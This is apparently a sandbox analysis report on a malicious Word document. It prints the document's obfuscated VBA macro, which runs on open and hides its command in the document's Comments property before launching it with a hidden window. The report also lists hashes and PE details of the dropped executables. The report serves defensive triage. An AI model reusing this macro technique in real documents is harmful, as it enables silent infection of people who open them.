Persistent Malware | Files
File Information
Sample files count 1
Created files count 5
Modified files count 3
c:\users\bgc6u8oy yxgxkr\desktop\sample_file.doc
File Properties
Names c:\users\bgc6u8oy yxgxkr\desktop\sample_file.doc (Sample File)
Size 59.00 KB (60416 bytes)
Hash Values MD5: e3f53eb751acc7eb18645753a15a1325
SHA1: b98d80994ef3f6a66ce37fabcb862752673de8d5
SHA256: 455be9278594633944bfdada541725a55e5ef3b7189ae13be8b311848d473b53
VBA Information
VBA Properties
Module Count 1
Macro Count 2
Module1.bas - Activate Workbook
Sub autoopen()
' AutoOpen is one of Word's auto-execute macro names, so this procedure runs
' as soon as the document is opened (the report labels it "Activate Workbook").
' Its only statement is a call to YPBALtUaxa, which holds the actual logic.
YPBALtUaxa
End Sub
Module1.bas - Eventless
Function YPBALtUaxa()
' Entry point called from autoopen. Every line of the form
' name = "lit" + "lit" + ... assigns a long concatenation of random-looking
' literals to a variable that is never read again anywhere in this listing;
' none of them feed the Shell call below, so they appear to be padding meant
' to defeat signature matching (inference from the visible code).
' NOTE(review): most of these lines contain several "x = ..." assignments
' fused together ("... + KPHsVttxfBg = ..."), which as written would not be
' a plain assignment in VBA; this looks like line breaks lost when the report
' extracted the module rather than the original source layout - confirm
' against the raw VBA stream before drawing conclusions from it.
LXxeuxgW = "WsKaCMuKU" + "pSbWwraCzK" + "vNZECzw" + "GRtZHMUNKxb" + "rDNkdeDH" + "DYnDmzfuZaV" + "RxdZuREUTKd" + KPHsVttxfBg = "RxzkKtCmM" + "sVdsXBppZ" + "zFuyFtSWh" + "LtAYsKBMK" + "SsSyLtfYmy" + "rGVxsLF" + "EcekhReVpLT" + vSNPHwVDHVx = "FyAWuwyU" + "RespRFT" + "czgPUeW" + "BUghykR" + "fYCWeHyS" + "MCDwxvgssMW" + "dKuCNTgWbfs" + bepZFRv = "XtCUWTDrmMv" + "MruufYeUR" + "PymSCENgkWh" + "mNrCGdD" + "gPDYdbBF" + "kwUmUXGMRXn" + "wfGLRRHR" + cmbFMfzX = "mvdTxDArt" + "nFSUzznK" + "gkuLNVz" + "HxNCCTWX" + "CHSvbdbdnyc" + "TRDULTsMGwV" + "BCGCBaK" + mFeewxy = "AUSYGPHwv" + "nBKyVvhfCYP" + "AkRpekv" + "AAPRMUNP" + "BUxhmvKchA" + "VMNkMCHS" + "CgfMeYPhFzW" + "wUGCYgCd"
ZFktLfW = "pguKBuA" + "fczercYgB" + "mBEzKDtCnWW" + "ZCZXyAt" + "BUhKfda" + "CnswDUA" + "zUXuKYSfFxX" + ySmvTnEbFS = "FxfzBuZhcs" + "DwTyMsShaDd" + "VeXfLaK" + "TNZvPrwxXvD" + "VyyRRbg" + "RftYgZS" + "BAxWvmcreT" + TFFystv = "MkYHprk" + "ecZfRBdCmmM" + "fFFVeEfC" + "ELWEXuUw" + "rtkCUtp" + "MPxbtAz" + "wTXBvaZusmZ" + "WAGGhmt"
VadCGdgd = "CtRSuxRLK" + "uZkbYfSR" + "dNXkYwKpF" + "sVKWfWytZ" + "fMaBeHVu" + "UTAaUgZtTXA" + "cLeaWVWhsp" + PePbMHYCp = "fyGPBHu" + "MxCTZzP" + "NEReWKHDRh" + "wPNnDsYUV" + "hyrmXrE" + "TwTFWUvnKYk" + "rsuLVGRZ" + tZBPeMgZgmb = "YzNgyKmzvRx" + "CsUZzDXw" + "ZMKYFckG" + "DXWTRRnCLht" + "mUHPVdbM" + "YKVSwncRTRp" + "KtGHVZbPV" + LdSYNHb = "VMsxhNG" + "XfvYKynMy" + "enUEHYA" + "mGVRSfbZykn" + "frAgyuCFKaB" + "kkbETbt" + "hSCDBhRVrda" + "TNARYcY"
ebbRTBFM = "NVGHZCgRGFN" + "ybzcFWSPbY" + "LfMkfxGd" + "LCCWUdDB" + "ndLygsgbak" + "fmCtWctKhY" + "agmLMdYt" + tFdnZyN = "UcrVbdeVFTW" + "FmrseLA" + "fSRkkBuerGf" + "vcsYTtLsas" + "HRPKERehx" + "KvhFNymkY" + "FBMgLpHZW" + RaDVhAM = "RUMeCZP" + "rFevcgb" + "dBnyFhUPn" + "LgSraHWMnsK" + "WSyECXp" + "MHNgRySGNMU" + "MSRDtwS" + cZPVGvR = "athdtPpxTk" + "tdHAPRvkD" + "WhetKTvXVY" + "RPFsPdv" + "PFbHtBGhH" + "NMBANNwaDds" + "aWYNtrrU" + "BBXNYcWSP"
' The only effectful statement in the module. VBA.Shell$ launches a command
' line assembled from eight variables on each side of the document's
' built-in "Comments" property (the property name is split as "Comme" + "nts"
' so the string does not appear in the macro text). The trailing 0 is the
' window-style argument (vbHide), so the spawned process has no visible window.
' None of rZCrTyu ... sNhYNbxua is assigned anywhere in this listing; if they
' are genuinely unset they evaluate to empty strings and the executed command
' is exactly whatever is stored in the document's Comments metadata. For
' triage, the command therefore has to be recovered from that property
' (and the created files listed in the report), not from the macro body.
VBA.Shell$ "" + rZCrTyu + gwUYEwFGR + SdCKBWRmm + dPgDectFAEK + zMZyYEh + GChpZzBgR + hkvnTphzVg + SgZmpppR + ActiveDocument.BuiltInDocumentProperties("Comme" + "nts") + rZCrTyu + gwUYEwFGR + SdCKBWRmm + dPgDectFAEK + zMZyYEh + GChpZzBgR + hkvnTphzVg + SgZmpppR + sNhYNbxua, 0
' More dead-string padding after the Shell call; again nothing below is read.
hZvnrDN = "zAEMZgBXATm" + "ZAhxtXm" + "xBCMkTRArZs" + "mcfPrznnKB" + "ztXTTLkrshU" + "BAnrHda" + "BLfMSWdEN" + TAeDWpm = "NEYBPbz" + "dYbUxrTzA" + "bkYNBvcKf" + "aGBNkUbhS" + "FLNYbpdHPzh" + "cUhhPCMMK" + "HppCTmXYAx" + aVNHeGntBc = "uUMbeAYf" + "CwZEARSew" + "zMBsKCF" + "uUmexuzkFwn" + "cpvscrP" + "FbzEWuRyRZX" + "wMMASWhrfC" + fCcAfNvw = "PrgRADKSZKD" + "PNAAMkm" + "MvarReXTzeC" + "frYcTFUe" + "grUpbNyy" + "KvuseXBhC" + "LdRscrpCp" + PbBXTEyXDg = "EXXvpXyv" + "xEdcpyZnERE" + "LUHHCmphpXR" + "SyuBTBGSG" + "EBfdfaWP" + "MtgxaGC" + "PfxYdtzCWtb" + ZryTTckxYPf = "ZhAyuant" + "gkXhpaH" + "XTYbKbhZGVA" + "tFmhVnR" + "gXKRAers" + "kTHZrxKVBk" + "NGcwzdsLV" + "pDuZtEGx"
nevByfzD = "YyzpDedfr" + "BkUFdGLKEP" + "tZZnVny" + "kVxyDpBUbe" + "BHmmtxs" + "bVTRGXh" + "zWtSrLD" + yAPMvhesKK = "YvzBwVhw" + "WvbDeNRgm" + "HGmxRKpeccm" + "GKEXXuEE" + "EFdUevzfcdu" + "dASKDCw" + "UrYngTuwudm" + YWnXHVmbrSr = "UmBWZzdBLe" + "eWAZhNm" + "uhFcwDBzk" + "nHhgBLCkcKV" + "RZvXMymAw" + "FadhENfdv" + "SsCaYfh" + UwWvTmfR = "brYLsbAwd" + "dfbPcNdGrGa" + "DDZzwbGpbZ" + "RgvUeegFf" + "dZawxtuHYZA" + "svzuRKnVxRt" + "DkwNAKdEk" + ypRNFLz = "SDXbGkD" + "wBcBWbukvMm" + "HPMteNZx" + "VgTWNcbskYD" + "kRWGaGrebrB" + "zTZskDx" + "xXSDNkmk" + "ZkyfVYCCChK"
XKMKrVsuNH = "VWpnWtWz" + "NcvvvbfEx" + "evScFkctbE" + "gLYELnNenFZ" + "MspEUzMd" + "htLHGUXFdH" + "nVKCKsHa" + pLwNywrMpvT = "csFtNHbbnD" + "rfxEpKWn" + "zkKuyCXSLb" + "GCmStsTVCWD" + "CkcAgSN" + "NZFPvNaUt" + "GvrfrndDrSF" + ZSXAkVr = "gWkuMCs" + "kxhkZrYW" + "zvaSnrYuny" + "EmkzbBuax" + "UkvuyXMvzM" + "PUyyWDv" + "YwDLwWtwDhk" + sCdDehrXu = "UcDHkNdgGwS" + "YBhPFwUnkN" + "BCMYsFS" + "uDACKdVt" + "rVeXEAtn" + "ymYBaKA" + "tPxCaGYgcHn" + "vFXwLZecKMt"
mwDRyVaab = "WcWGVZxvbv" + "wLTzkvpWTZ" + "PEWXYXXvD" + "dVtGSfaTDW" + "HXnePFyw" + "vCsvdTNyc" + "MVByGEKXEzc" + mfKAYhzVYL = "VzznTVmW" + "LzxWFuCL" + "mgeVcxVF" + "BZkUkGtsBfC" + "bnTaUYFmsdT" + "ZdeYysxR" + "fDSwgeE" + "PCMpMucuwM"
End Function
c:\users\bgc6u8oy yxgxkr\appdata\local\temp\42753.exe, ...
File Properties
Names c:\users\bgc6u8oy yxgxkr\appdata\local\temp\42753.exe (Created File)
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe (Created File)
Size 100.00 KB (102400 bytes)
Hash Values MD5: d6c8126371d37ffe3100755db6aa22ed
SHA1: 294b381e200aa3f343989877c9ef5efdda25ca42
SHA256: fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec
PE Information
File Properties
Image Base 0x400000
Entry Point 0x401640
Size Of Code 0x3000
Size Of Initialized Data 0x16000
Size Of Uninitialized Data 0x0
Format x86
Type Executable
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_I386
Compile Timestamp 2017-10-03 18:31:10
Compiler/Packer Unknown
Sections (4)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x2dd0 0x3000 0x1000 CNT_CODE, MEM_EXECUTE, MEM_READ 6.25
.data 0x404000 0x1174 0x1000 0x4000 CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE 0.69
.crt 0x406000 0x12788 0x13000 0x5000 CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE 7.61
.reloc 0x419000 0x292 0x1000 0x18000 CNT_INITIALIZED_DATA, MEM_DISCARDABLE, MEM_READ 1.11
Imports (37)
msvcrt.dll (4)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
memset 0x0 0x40609c 0x18420 0x17420
strcspn 0x0 0x4060a0 0x18424 0x17424
strtod 0x0 0x4060a4 0x18428 0x17428
fgetwc 0x0 0x4060a8 0x1842c 0x1742c
ESENT.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
JetBeginExternalBackup 0x0 0x406010 0x18394 0x17394
GDI32.dll (2)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
GetLogColorSpaceA 0x0 0x406018 0x1839c 0x1739c
GetCurrentObject 0x0 0x40601c 0x183a0 0x173a0
COMDLG32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
GetSaveFileNameW 0x0 0x406008 0x1838c 0x1738c
msi.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
(by ordinal) 0xa0 0x406094 0x18418 0x17418
ADVAPI32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
OpenSCManagerW 0x0 0x406000 0x18384 0x17384
KERNEL32.dll (27)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
InterlockedExchange 0x0 0x406024 0x183a8 0x173a8
LoadLibraryA 0x0 0x406028 0x183ac 0x173ac
GetProcAddress 0x0 0x40602c 0x183b0 0x173b0
GetLastError 0x0 0x406030 0x183b4 0x173b4
RaiseException 0x0 0x406034 0x183b8 0x173b8
LoadResource 0x0 0x406038 0x183bc 0x173bc
FreeLibrary 0x0 0x40603c 0x183c0 0x173c0
LocalFree 0x0 0x406040 0x183c4 0x173c4
LocalAlloc 0x0 0x406044 0x183c8 0x173c8
CreateFileW 0x0 0x406048 0x183cc 0x173cc
FileTimeToLocalFileTime 0x0 0x40604c 0x183d0 0x173d0
UnhandledExceptionFilter 0x0 0x406050 0x183d4 0x173d4
ReadFile 0x0 0x406054 0x183d8 0x173d8
GetTimeZoneInformation 0x0 0x406058 0x183dc 0x173dc
GetVersionExW 0x0 0x40605c 0x183e0 0x173e0
InterlockedIncrement 0x0 0x406060 0x183e4 0x173e4
DefineDosDeviceW 0x0 0x406064 0x183e8 0x173e8
CloseHandle 0x0 0x406068 0x183ec 0x173ec
SetErrorMode 0x0 0x40606c 0x183f0 0x173f0
InterlockedDecrement 0x0 0x406070 0x183f4 0x173f4
IsDebuggerPresent 0x0 0x406074 0x183f8 0x173f8
AreFileApisANSI 0x0 0x406078 0x183fc 0x173fc
SetFileApisToANSI 0x0 0x40607c 0x18400 0x17400
SetFileApisToOEM 0x0 0x406080 0x18404 0x17404
GetWindowsDirectoryA 0x0 0x406084 0x18408 0x17408
lstrcatA 0x0 0x406088 0x1840c 0x1740c
GetBinaryTypeA 0x0 0x40608c 0x18410 0x17410
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, ...
File Properties
Names c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe (Created File)
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe (Created File)
Size 92.00 KB (94208 bytes)
Hash Values MD5: 2b8584cab96d20ee851054f9fedef7f3
SHA1: de72320cc8fc12f2e410afa07809b620f81066dc
SHA256: f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1
PE Information
File Properties
Image Base 0x400000
Entry Point 0x401d90
Size Of Code 0x3c00
Size Of Initialized Data 0x14000
Size Of Uninitialized Data 0x0
Format x86
Type Executable
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_I386
Compile Timestamp 2017-10-12 21:31:20
Compiler/Packer Unknown
Sections (5)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x3acc 0x3c00 0x400 CNT_CODE, MEM_EXECUTE, MEM_READ 6.16
.data 0x405000 0x1f60 0x1000 0x4000 CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE 6.79
.crt 0x407000 0x116ba 0x11800 0x5000 CNT_INITIALIZED_DATA, MEM_READ 7.64
.rsrc 0x419000 0x440 0x600 0x16800 CNT_INITIALIZED_DATA, MEM_READ 2.62
.reloc 0x41a000 0x17c 0x200 0x16e00 CNT_INITIALIZED_DATA, MEM_DISCARDABLE, MEM_READ 4.88
Imports (15)
SETUPAPI.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
SetupFindFirstLineW 0x0 0x407034 0x1854c 0x1654c
COMCTL32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
GetMUILanguage 0x0 0x407000 0x18518 0x16518
ntdll.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
memset 0x0 0x407044 0x1855c 0x1655c
ole32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
CoGetObjectContext 0x0 0x40704c 0x18564 0x16564
SHELL32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
SHGetFileInfoA 0x0 0x40703c 0x18554 0x16554
KERNEL32.dll (10)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
LoadLibraryA 0x0 0x407008 0x18520 0x16520
ConvertFiberToThread 0x0 0x40700c 0x18524 0x16524
GetLastError 0x0 0x407010 0x18528 0x16528
InterlockedExchange 0x0 0x407014 0x1852c 0x1652c
FreeLibrary 0x0 0x407018 0x18530 0x16530
GetProcAddress 0x0 0x40701c 0x18534 0x16534
LocalFree 0x0 0x407020 0x18538 0x16538
LocalAlloc 0x0 0x407024 0x1853c 0x1653c
RaiseException 0x0 0x407028 0x18540 0x16540
GetConsoleCP 0x0 0x40702c 0x18544 0x16544
c:\programdata\c570.tmp, ...
File Properties
Names c:\programdata\c570.tmp (Created File)
c:\programdata\c571.tmp (Created File)
c:\programdata\c572.tmp (Created File)
Size 0.00 KB (0 bytes)
Hash Values MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
c:\programdata\c572.tmp
File Properties
Names c:\programdata\c572.tmp (Created File)
Size 0.11 KB (112 bytes)
Hash Values MD5: f10107805ff54bb9c1e1cb047b604439
SHA1: 787f5296c509df55e9dea0f22ea76afaa8953676
SHA256: f4a00adb6eeaf4985068b04cb755ecb8874f7e4fbdd7c8630b0ba96c99b63a68
c:\programdata\c571.tmp
File Properties
Names c:\programdata\c571.tmp (Created File)
Size 0.11 KB (112 bytes)
Hash Values MD5: 36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f
SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat
File Properties
Names c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat (Modified File)
Size 64.00 KB (65536 bytes)
Hash Values MD5: e56a6538abf1d60544ce14111c423323
SHA1: f57cc7b3be0d2cf0b65d0397e76c73717bd1a96b
SHA256: 0341e7374090ca82b3ff7c1a6cbfd85ebc48be5ec3135aaf183c0c0c7da993da
c:\users\bgc6u8oy yxgxkr\appdata\roaming\microsoft\windows\cookies\index.dat
File Properties
Names c:\users\bgc6u8oy yxgxkr\appdata\roaming\microsoft\windows\cookies\index.dat (Modified File)
Size 32.00 KB (32768 bytes)
Hash Values MD5: e8289ca60a86329fef2726ababd2b99a
SHA1: a2567af5c9e4f7f9e9e08f5f8aec657a41692d4d
SHA256: 33900323a9a4bdde6a22ee56a613f0dd67f275d3571321cdac54ea7321e244de
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\index.dat
File Properties
Names c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\index.dat (Modified File)
Size 64.00 KB (65536 bytes)
Hash Values MD5: 4d32b3456316311c50d77f7a37556236
SHA1: 47f9117eb7cf12bd3c36295b8084e98d962b6861
SHA256: 4ff606ec32478199d9183c9ec73ed4d0787f52ecc6504b7ce2d5cdf3ded0a5a6